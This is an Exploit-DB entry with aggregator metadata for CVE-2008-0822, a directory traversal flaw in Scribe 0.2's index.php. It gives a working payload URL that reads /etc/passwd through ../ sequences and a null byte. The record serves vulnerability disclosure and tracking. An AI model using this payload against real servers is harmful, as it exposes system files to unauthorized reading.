ID EDB-ID:5123
Type exploitdb
Reporter muuratsalo
Modified 2008-02-14T00:00:00
Description
Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability. CVE-2008-0822. Webapps exploit for php platform
scribe 0.2 local file inclusion vulnerability
download http://sourceforge.net/projects/scribe/
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00
# milw0rm.com [2008-02-14]
{"id": "EDB-ID:5123", "hash": "256f6a4a35c89b1df3abaa4bb65b3f95", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Scribe <= 0.2 index.php page Local File Inclusion Vulnerability", "description": "Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability. CVE-2008-0822. Webapps exploit for php platform", "published": "2008-02-14T00:00:00", "modified": "2008-02-14T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/5123/", "reporter": "muuratsalo", "references": [], "cvelist": ["CVE-2008-0822"], "lastseen": "2016-01-31T22:38:01", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0822"]}], "modified": "2016-01-31T22:38:01"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5123/", "sourceData": "scribe 0.2 local file inclusion vulnerability\n\ndownload http://sourceforge.net/projects/scribe/\nauthor muuratsalo\ncontact muuratsalo[at]gmail.com\n\nexploit \nhttp://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00\n\n# milw0rm.com [2008-02-14]\n", "osvdbidlist": ["42225"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-16T10:52:02", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in index.php in Scribe 0.2 allows remote attackers to read arbitrary local files via a .. (dot dot) in the page parameter.", "modified": "2018-10-15T18:03:11", "published": "2008-02-19T15:44:00", "id": "CVE-2008-0822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0822", "title": "CVE-2008-0822", "type": "cve", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}